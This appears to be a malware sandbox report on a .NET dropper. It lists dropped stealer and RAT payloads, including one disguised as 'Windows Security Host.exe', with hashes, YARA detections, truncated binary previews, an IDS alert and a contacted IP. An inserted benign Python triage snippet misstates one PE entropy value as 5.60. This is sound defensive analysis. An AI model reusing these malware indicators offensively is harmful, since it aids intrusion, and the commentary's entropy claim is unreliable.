                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........|............................................................0..R.......(....:....*r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&*.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o......*.......8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(......*.....(....~....%:....&~......*...s....%.....(...+*...0..l.........(....r...p(....(....r\..p.
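The dropped-file records above all carry the same triage fields: size, an 8-bit Shannon entropy, an "Encrypted" flag, MD5/SHA-1/SHA-256/SHA-512, and a short preview showing whether the file starts with a DOS/PE header. The following Python is an added example written for this page, not Joe Sandbox's own code; it reproduces those fields for arbitrary bytes so an analyst can run the same checks on a quarantined sample offline. Assumptions: the inputs are constructed in the script (a synthetic PE-like buffer and a uniform byte run), the 7.2 bits/byte cut-off used for "likely packed or encrypted" is this example's own heuristic and not the criterion behind the report's "Encrypted" flag, and the PE check only validates the MZ signature and the PE\0\0 signature at e_lfanew rather than parsing the full header. SSDEEP is omitted because it needs a third-party library. Note that the two PE files listed here sit at 5.60 and 6.05 bits/byte, well below that cut-off, which is consistent with the report's "Encrypted:false" for both.

```python
import hashlib
import math
from collections import Counter

# Constructed sample inputs (NOT files from the sandbox report).
SAMPLE_UNIFORM = bytes(range(256)) * 4        # every byte value equally likely
SAMPLE_CONSTANT = b"A" * 1000                 # a single repeated byte


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 (constant) .. 8.0 (uniform).
    This is the same quantity the report labels 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256/SHA-512 as upper-case hex, matching the report layout."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def looks_like_pe(data: bytes) -> bool:
    """Minimal header sanity check (assumption: MZ + PE\\0\\0 at e_lfanew is enough
    for triage; this is not a full PE parser)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe(filler: bytes) -> bytes:
    """Construct a synthetic MZ/PE buffer for testing (not a real executable)."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")   # e_lfanew -> offset 0x80
    return bytes(hdr) + b"PE\x00\x00" + filler


def triage(name: str, data: bytes, entropy_threshold: float = 7.2) -> dict:
    """Produce one record in the spirit of the report's dropped-file table.
    entropy_threshold is this example's heuristic, not the sandbox's rule."""
    ent = entropy_8bit(data)
    rec = {
        "name": name,
        "size": len(data),
        "entropy": round(ent, 4),
        "is_pe": looks_like_pe(data),
        "likely_packed_or_encrypted": ent >= entropy_threshold,
    }
    rec.update(file_hashes(data))
    return rec


if __name__ == "__main__":
    for label, blob in [
        ("uniform.bin", SAMPLE_UNIFORM),
        ("constant.bin", SAMPLE_CONSTANT),
        ("fake.exe", build_fake_pe(b"\x00" * 16)),
    ]:
        r = triage(label, blob)
        print(f"{r['name']:<13} size={r['size']:<6} entropy={r['entropy']:<7} "
              f"pe={r['is_pe']!s:<5} packed?={r['likely_packed_or_encrypted']!s:<5} "
              f"sha256={r['SHA-256'][:16]}...")
```

To use this on a real dropped file, read it in binary mode and pass the bytes to triage(); compare the SHA-256 against the report before trusting any other field, since a single differing byte (for example a re-dropped copy with a patched config) changes the hash while leaving size and entropy almost unchanged.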
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):235008
                                                                                                                                                      Entropy (8bit):6.051866015636964
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4fDDU7ByalpgRj++72VQb8e1m0tJi:noZtL+EP8fDDU7ByalpgRj++7J9u
                                                                                                                                                      MD5:3882CFE50E35985982E9EF0C01B99C47
                                                                                                                                                      SHA1:6E09C71AE230B839163628C9179B3A3AAC58C1A3
                                                                                                                                                      SHA-256:DA73DB144E8035DD81AB4578B7F856131351EC33119C9CE0C46D852499621636
                                                                                                                                                      SHA-512:A539767DC599B8A6103C413B4A42C83C7CE09D3171C45890F2630AD000166854C5AC220F78AB966EA90C55C1D6361CE70EA5AB3671FC2913445E8009126A534E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................4...W.......P............................................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):3.7195394315431693
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                                                      MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                                                      SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                                                      SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                                                      SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):81408
                                                                                                                                                      Entropy (8bit):5.954946666720508
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:JuB5dC/mjCuRfzCJskO2r7k9M+bKr4xiyOiRM1Z0Yfka6fTTSnxOcxC7QLd0D:JtWCAu7t7X+bKU4/dNfkTX6OoGQLiD
                                                                                                                                                      MD5:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      SHA1:087FFD969B37A73B349A81AF18BB51191EB42CBD
                                                                                                                                                      SHA-256:84BE55FB4B514EBDB999B5CAF4E0837C521B5E7A4F85F636E4593DAF09EEDAE9
                                                                                                                                                      SHA-512:9F63CFDB94AF23CEBC85FFD491364C1A90AB90736FC8DA0FE16EBF2FB18E9A6EB8FEA4DFCA87D8353565BA684B0C8F461371588AAC72101B355886619BF672F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....26g.................4..........^S... ...`....@.. ....................................@..................................S..O....`............................................................................... ............... ..H............text...d3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................@S......H........^..........&.....................................................(....*.r...p*. E/..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*. ....*.ry..p*. .X~.*.r...p*. W.0.*.r...p*. *p{.*.r2..p*. ^c{.*..((...*.r...p*. J...*.rv..p*. 9...*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(G...(9...~....o[...&.-.*.r...p*. .n..*.r...p*. ...*.r'..p*.r...p*.rM..p*. .O..*.r...p*..............j..................s\..............*"(I...+.*:.t....(D...+.*
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 14 19:20:03 2024, mtime=Thu Nov 14 19:20:03 2024, atime=Thu Nov 14 19:20:03 2024, length=81408, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):849
                                                                                                                                                      Entropy (8bit):5.145376726674209
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8PnYf/sB4Dyp4j6CQuDrNFjAolaW+LgUNwuLzLXbU44t2YZ/elFlSJmkmV:8G/vDSBAdxAQ+L73XbUwqygm
                                                                                                                                                      MD5:D1F98D1B74680FFF164A1ED4B9288F03
                                                                                                                                                      SHA1:8D65A85B7EF36FA4B6D7F37A52167638BEEC1017
                                                                                                                                                      SHA-256:927B32D237B176745AD4216EBEE74423CBA55AD843D8F1530335E57AE70BE140
                                                                                                                                                      SHA-512:38E1BA8A180D83ED91454C955A7A31D9E430C0A67E837707B8B89B7DDDF2196FE758929E5EDBD6B04BD6650084D0223C0B24A4CEF525F1F97DE86D30219FDEA3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.... ....{j..6...{j..6...{j..6...>........................:..DG..Yr?.D..U..k0.&...&......Qg.*_....{j..6..N.l..6......t.".CFSF..2..>..nY.. .WINDOW~1.EXE....t.Y^...H.g.3..(.....gVA.G..k...d......nY..nY......IL....................J.w.W.i.n.d.o.w.s. .S.e.c.u.r.i.t.y. .H.o.s.t...e.x.e...H...[...............-.......Z...................C:\Users\user\Windows Security Host.exe........\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .S.e.c.u.r.i.t.y. .H.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......888683...........hT..CrF.f4... ..]+.....,......hT..CrF.f4... ..]+.....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):103
                                                                                                                                                      Entropy (8bit):4.081427527984575
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
                                                                                                                                                      MD5:B016DAFCA051F817C6BA098C096CB450
                                                                                                                                                      SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
                                                                                                                                                      SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
                                                                                                                                                      SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):81408
                                                                                                                                                      Entropy (8bit):5.954946666720508
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:JuB5dC/mjCuRfzCJskO2r7k9M+bKr4xiyOiRM1Z0Yfka6fTTSnxOcxC7QLd0D:JtWCAu7t7X+bKU4/dNfkTX6OoGQLiD
                                                                                                                                                      MD5:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      SHA1:087FFD969B37A73B349A81AF18BB51191EB42CBD
                                                                                                                                                      SHA-256:84BE55FB4B514EBDB999B5CAF4E0837C521B5E7A4F85F636E4593DAF09EEDAE9
                                                                                                                                                      SHA-512:9F63CFDB94AF23CEBC85FFD491364C1A90AB90736FC8DA0FE16EBF2FB18E9A6EB8FEA4DFCA87D8353565BA684B0C8F461371588AAC72101B355886619BF672F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....26g.................4..........^S... ...`....@.. ....................................@..................................S..O....`............................................................................... ............... ..H............text...d3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................@S......H........^..........&.....................................................(....*.r...p*. E/..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*. ....*.ry..p*. .X~.*.r...p*. W.0.*.r...p*. *p{.*.r2..p*. ^c{.*..((...*.r...p*. J...*.rv..p*. 9...*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(G...(9...~....o[...&.-.*.r...p*. .n..*.r...p*. ...*.r'..p*.r...p*.rM..p*. .O..*.r...p*..............j..................s\..............*"(I...+.*:.t....(D...+.*
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.416912722070465
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:scifpi6ceLPL9skLmb0mLSWSPtaJG8nAgex285i2MMhA20X4WABlGuNw5+:Bi58LSWIZBk2MM6AFBmo
                                                                                                                                                      MD5:E3C77FDCDD4EC78CBA5D2C96888C53BE
                                                                                                                                                      SHA1:A92DAE6468D6EA22AE0129EA24A814BE911A367B
                                                                                                                                                      SHA-256:38A22BBA90A435C793EEEC16184F6D1C531F0D13C1875C3DA6303E6D3C7FCAF3
                                                                                                                                                      SHA-512:E451FD16C3319D92F817C745AB3961FC2DC2A79C14297E17A77C3A2E66641044E9E2E33BC66794E7601C7C92414D25EED73EC33523C1B2F2C0883ED87A96002B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Q.b.6..............................................................................................................................................................................................................................................................................................................................................q..V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      File Type:ISO-8859 text, with CRLF, LF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):571
                                                                                                                                                      Entropy (8bit):4.9398118662542965
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                                                                                                                                      MD5:5294778E41EE83E1F1E78B56466AD690
                                                                                                                                                      SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                                                                                                                                      SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                                                                                                                                      SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                      Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):5.216802154727575
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                      File name:8Hd0ZExgJz.exe
                                                                                                                                                      File size:819'200 bytes
                                                                                                                                                      MD5:7198fa10a50ea9aaf6ae5c2a05af2104
                                                                                                                                                      SHA1:c35a2a73313e3c5ad08136e3bc583bb9bc26964c
                                                                                                                                                      SHA256:073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
                                                                                                                                                      SHA512:56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
                                                                                                                                                      SSDEEP:12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0
                                                                                                                                                      TLSH:2905230A4BEE0C7DD77DE73706A0F973996EBA0598F71B2D3169BA7877810884CC0588
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...586g................................. ........@.. ....................... ............@................................
                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                      Entrypoint:0x46c3ae
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x67363835 [Thu Nov 14 17:49:41 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6c358 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x500 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6a3b4 | 0x6a400 | 8c63a4e666bde439a1915d82b13bdf3c | False | 0.9885409007352941 | data | 7.99421164591081 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6e000 | 0x500 | 0x600 | b5405ad108bed587b3871e842cae6fb2 | False | 0.3834635416666667 | data | 3.8065542020784315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x70000 | 0xc | 0x200 | c88fbc229bf1ab0ff5ddd3913e93e3d4 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6e0a0 | 0x26c | data | | | 0.4596774193548387
RT_MANIFEST | 0x6e310 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

Imports

DLL | Import
mscoree.dll | _CorExeMain
IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-14T20:14:06.891834+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49703 | 104.21.93.27 | 443 | TCP
Network traffic

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 14, 2024 20:14:02.072776079 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:02.072873116 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:02.072957993 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
